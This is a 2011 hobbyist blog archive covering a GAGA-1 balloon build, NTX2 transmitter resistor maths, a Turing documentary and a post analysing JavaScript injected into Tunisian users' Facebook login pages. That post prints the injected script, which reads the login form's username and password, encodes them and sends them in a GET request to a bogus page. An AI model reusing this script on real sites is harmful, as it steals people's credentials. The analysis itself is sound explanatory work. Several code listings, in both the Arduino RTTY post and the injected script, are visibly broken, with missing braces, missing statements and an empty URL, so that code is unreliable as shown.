Friday, January 28, 2011

Calculating, rather than experimenting to find, resistor values for the NTX2 voltage divider

A previous blog post showed the voltage divider circuit I'm using to drive the Radiometrix NTX2 transmitter in GAGA-1. And another blog post gave a spreadsheet for working out the voltages based on resistor values.

What you really want, though, is a way to say "given this required frequency shift what should the resistor values be?". Recall the circuit diagram I was using.
Arduino                         Radio
7 ---27K--------------\
                       ---------- TX
8 ---22K----2K2-------/
Now, replace the specific resistances on the left with R1 and R2 and the input impedance to ground with 100K (the value from the datasheet):
Arduino                      Radio
7 ---R1--------------\
8 ---R2--------------/
Pins 7 and 8 are connected to either 5V or Gnd to make the divider so you have two configurations:
Arduino                      Radio
5V  ---R1--------------\
Gnd ---R2--------------/

Gnd ---R1--------------\
5V  ---R2--------------/
In both cases you can see that one of R1 or R2 is in parallel with the 100K input impedance so the dividers look like (I've used || to indicate the resistances in parallel):
5V  ---R1--------------X----------R2||100K---Gnd

5V  ---R2--------------X----------R1||100K---Gnd
Where the X is the connection to the TX pin and hence where we need specific voltages. For a 425Hz shift the difference between the two voltages needs to be 3/5000*425 (since the NTX2 has a deviation of 5kHz driven by a 0 to 3V value). Thus you can derive the following formula for the difference between the two voltages.

This simplifies to the following when you assume that R1 and R2 are positive (they are resistors after all!)

And that's a rather simple formula relating the resistances. Here's a graph of it (all resistance values are in k).

The cross hairs there correspond to one 22K resistor and another at about 24K2. Of course, if the input impedance isn't precisely 100K this isn't going to work, but the general method will.

The Genius of Turing

For some time I've been involved (albeit only slightly) in a new documentary about Alan Turing. Happily, I can now talk about it. Here's the official blurb:
Alan Turing was the British WW II code breaker and father of computer science who faced persecution for being gay. In his short life, Turing profoundly changed our world. Historians believe that his WW2 code breaking work helped save millions of lives and shortened the war by two years. He also founded three new scientific fields: computer science, artificial intelligence, and morphogenesis.

In 1952, he was arrested by British police for having a relationship with another man and eventually was forced to undergo chemical castration to "fix" his sexual orientation. Two years after his arrest, Turing killed himself at age 41. Turing is one of the most important scientists ever, yet his tragic story and lasting legacy remain largely unknown. This film will change that fact.

Almost 100 years after his birth, an international production team is set to take viewers on a journey to rediscover Alan Turing. Research and development for this feature-length drama documentary is underway, with plans to reach millions of viewers around the world through broadcast and theatrical release. The international production team includes Turing's preeminent biographer Dr. Andrew Hodges. Funding is currently being lined up for the film, with a goal for completion in mid-2012, to coincide with the centenary of Turing's birth. It's an important story that needs to be told.
And here's a little trailer:

More details of the film are here. The producers are busy fund-raising and working on the film with the aim of getting it finished for Turing's centenary in 2012.

Thursday, January 27, 2011

Voltage divider calculator for Radiometrix NTX2

In the configuration being used to drive the Radiometrix NTX2 in GAGA-1 there are two resistors (called them R1 and R2) that are creating a voltage divider and a third resistance (the input impedance of the module).

The module takes 0-3V on the TX pin and converts it to a 0-5Khz frequency shift from the centre frequency.

So to make calculations easy I made a little spreadsheet that allows you to punch in the two resistor values, the voltage supplied to the voltage divider and the input impedance to get a predicated pair of voltages sent to the TX pin, plus the corresponding frequency shift.

It's an Apple Numbers file and you can get it here (Excel version).

Wednesday, January 26, 2011

GAGA-1: Flight Computer radio's first transmission

Work is progressing on the flight computer with the first RTTY transmission. In the picture you can see the computer (the Arduino) in the foreground, connected with test leads to a small breadboard containing a voltage divider made from three resistors which then connects to the radio itself. The radio is connected to the ground plane antenna in the capsule.

The radio module is a Radiometrix NTX2 which transmits using FSK on 434.650Mhz. Its TX pin takes a voltage between 0 and 3V and converts that into a frequency shift of 0 to 5kHz. For the RTTY transmission I'll be using a shift of 425Hz between the mark and space frequencies.

That shift corresponds to a difference in voltage on the TX pin of 0.255V. The configuration I'm using is based on picoatlas where a pair of pins from the Arduino are used to power a voltage divider. The set up is as follows:
Arduino                         Radio
7 ---27K--------------\
                       ---------- TX
8 ---22K----2K2-------/
The pins 7, 8 and are switched so that one gives 5V and the other 0V. Thus the TX will be fed 2.36V or 2.64V depending on which is high and which is low. That's a difference of 0.27V. The TX pin has an input impedance of 100K and in the real measured circuit the voltages at the TX pin were 2.01V and 2.25V for a 0.24V shift. That should correspond to a shift of 400Hz. I'll measure that later.

The test code is as follows:
// These are the digital pins used to control the Radiometrix NTX2
// module.  TX0/TX1 are for the two tones used for RTTY and EN is
// connected to the Enable pin to enable or disable the module

#define EN  6
#define TX0 8
#define TX1 7

// These are the pins used to read/write two the internal and
// external temperature sensors

#define TEMP_INT
#define TEMP_EXT

void setup()
  // Set up the pins used to control the radio module and switch
  // it on
  pinMode( EN,  OUTPUT );
  pinMode( TX0, OUTPUT );
  pinMode( TX1, OUTPUT );
  digitalWrite( EN, HIGH );

void loop()
    char test[255];
    sprintf( test, "GAGA-1 High Altitude Balloon Test Transmission on 434.650 @ 10mW" );

// ---------------------------------------------------------------------------------
// RTTY Code
// Code to send strings via RTTY.  The RTTY parameters are defined by constants
// below.
// ---------------------------------------------------------------------------------

// The number of bits per character (7), number of start bits (1), number of stop bits (2)
// and the baud rate.

#define ASCII 7 
#define START 1
#define STOP 2
#define BAUD 50
#define INTER_BIT_DELAY (1000/BAUD)

// rtty_send: sends a null-terminated string via radio to the ground trackers
void rtty_send( char * s ) // The null-terminated string to transmit
  char c;
  while ( c = *s++ ) {
    int i;
    for ( i = 0; i < START; ++i ) {
    int b;   
    for ( i = 0, b = 1; i < ASCII; ++i, b *= 2 ) {
    for ( i = 0; i < STOP; ++i ) {
  // Note that when idling RTTY specifies that it be in the 'mark' state (or 1).  This
  // is achieved by the stop bits that were sent at the end of the last character. 

// rtty_bit: sends a single bit via RTTY
void rtty_bit(int b) // Send 0 if b is 0, 1 if otherwise
Thanks to everyone on #highaltitude for tips and encouragement.

Saturday, January 22, 2011

GAGA-1: Getting close to completion

The last time I updated on GAGA-1 it was when I cut the hole for the camera. Since then I've had a little time to work on it and things are getting close to completion. There's still a bunch of software to write for the flight computer, but that shouldn't take long. The launch will now be in the early spring when the winds are favourable.

First, here's a nice shot of where I was. It shows the interior of the capsule with the recovery computer mounted in place, a rough location for its battery pack and the camera. The two SMA connectors are for the GPS and the GSM antennas.

The first thing I did was make a couple of battery connectors with leads of the right length. I've bought two battery holders (one holds 4 AAs for the recovery computer, the other holds 6 AAs for the flight computer). Both have snap on connectors in the PP3 style and so I soldered up some short leads.

The next job was to shorten the leads on the GSM and GPS antennas. They came with leads 5m long and I needed to get them down to a few cms otherwise there would be excess weight from useless wire. I cut the leads and soldered on new SMA connectors.

This was a total pain to do (any excess solder on the pin in the connector and inserting it was a nightmare). Finally, I got the three done with much poor language. Looks like there's some braid that needs trimming in this photograph:

Next job was fitting in notice to the outside of the box in case it gets lost. This is a piece of paper that's been laminated and then hot glued to the outside (I've masked my phone number here but it is on the real box). Inside the box there's the same message printed on a small piece of paper just in case the outer one was lost somehow.

To reduce the impact of Murphy's Law I painted all the connectors with colours that match so that I don't do something stupid like connect the GPS to the GSM antenna or wire up the wrong battery.

Then it was on to the flight computer radio. This consists of a Radiometrix NTX2 connected to the Arduino flight computer using a custom board. Here's the partially constructed board. It mounts on top of the Arduino and subsequently I've added a couple of resistors and an SMA socket.

The radio, of course, needs an antenna and for this purpose I built my own 1/4 wave, ground plane antenna tuned to the frequency at which GAGA-1 will transmit. It consists of five pieces of cut up coat hanger. Each piece if 16.4cm long (1/4 of the wavelength of the GAGA-1 transmitter).

Four of the pieces are joined together and form the ground plane; there are mounted flat against the bottom of the capsule. The fifth piece points downwards and is mounted at right angles to the ground plane. The ground plane is connected to the braid of a small piece of coax recovered from the GSM antenna wire I cut; the central piece is connected to the coax central conductor. The coax has a new SMA connector on the end for connection to the flight computer.

Finally, I painted and hot glued polystyrene balls to the ends of the antenna pieces to stop me (or others) getting poked by it. Here's a shot of GAGA-1 on its side with the antenna in place (the pieces are held together by a small round piece of plastic I found in my box of random stuff).

Some final tasks to perform are:

1. Fit the Lassen IQ GPS to the Arduino board
2. Write the flight computer software
3. Connect up the DS1821+ temperature sensors

Then I'll be ready for a full system test.

PS Having got all this stuff done I did a quick weigh in by shoving everything in the box (batteries and as yet unsoldered components). It weighed in at 989g. Pretty close to my original desire for 1kg.

PPS I will publish a schematic of the Arduino board when it's done.

The code injected to steal passwords in Tunisia

It's been floating around the net for weeks now, but I finally took a look at how someone in Tunisia (assumption is the government) was stealing usernames and passwords from common sites like Google Mail and Facebook.

The attack worked like this:

1. When a user visited a site like Facebook JavaScript would be injected into the page where the user types in their username and password. On Facebook these pages are served via HTTP and so the injection is possible if you can intercept at the ISP level. The actual username and password are sent via HTTPS but once the JavaScript is in there it's game over.

2. The login form itself is modified to include an onsubmit handler that calls the JavaScript function hAAAQ3d (which reads as hacked). That function reads the username and password and makes an HTTP call to a bogus page on Facebook. This page (named wo0dh3ad, which I think you can read was woodhead) has the username and password appended as parameters with some code to make them URL safe.

3. Someone, somewhere reads those URLs to extract the username and password. That could be done from a log file, or even a firewall could have been configured to filter these requests so that they would never reach Facebook.

I've pretty printed the code below. The major functions are hAAAQ3d (described above), r5t (generates a random string of characters which are added to the request URL used to send the username and password) and h6h (which I read as 'hash' which takes a username or password and converts it to a string of lowercase characters that can be safely transmitted in a URL).

There are helper functions inv0k(1,2,3) (which I read as 'invoke') which make the actual HTTP request. Two are used for different browser types and third is not used, but what it does is modify an injected image tag to get the same URL used to send the username/password.
function h6h(st)
  var st2="";
  for ( i = 0; i < st.length; i++ ) {
    c = st.charCodeAt(i);
    ch = (c & 0xF0) >> 4;
    cl = c & 0x0F;
    st2 = st2 + String.fromCharCode( ch + 97 ) + 
                String.fromCharCode( cl + 97 );
  return st2;

function r5t(len)
  var st = "";
  for ( i = 0; i < len; i++ )
    st = st + String.fromCharCode( Math.floor( Math.random( 1 ) * 26 + 97 ) ); 
  return st;

function hAAAQ3d()
  var frm = document.getElementById( "login_form" ); 
  var us3r =; 
  var pa55 = frm.pass.value;
  var url = "" + r5t( 5 ) + 
      "&u=" + h6h( us3r ) + "&p=" + h6h( pa55 ); 
  var bnm = navigator.appName; 
  if ( bnm == 'Microsoft Internet Explorer' )

function inv0k1(url) 
  var objhq = document.getElementById("x6y7z8"); 
  objhq.src = url;

function inv0k2(url)
  var xr = new XMLHttpRequest();"GET", url, false); 

function inv0k3(url) 
  var xr = new ActiveXObject('Microsoft.XMLHTTP');"GET", url, false); 

Monday, January 10, 2011

A couple of videos of the Bombe cracking Engima at Bletchley Park

I spent the weekend at Bletchley Park and managed to see a demonstration of the Bombe cracking Enigma. Here are a couple of short videos: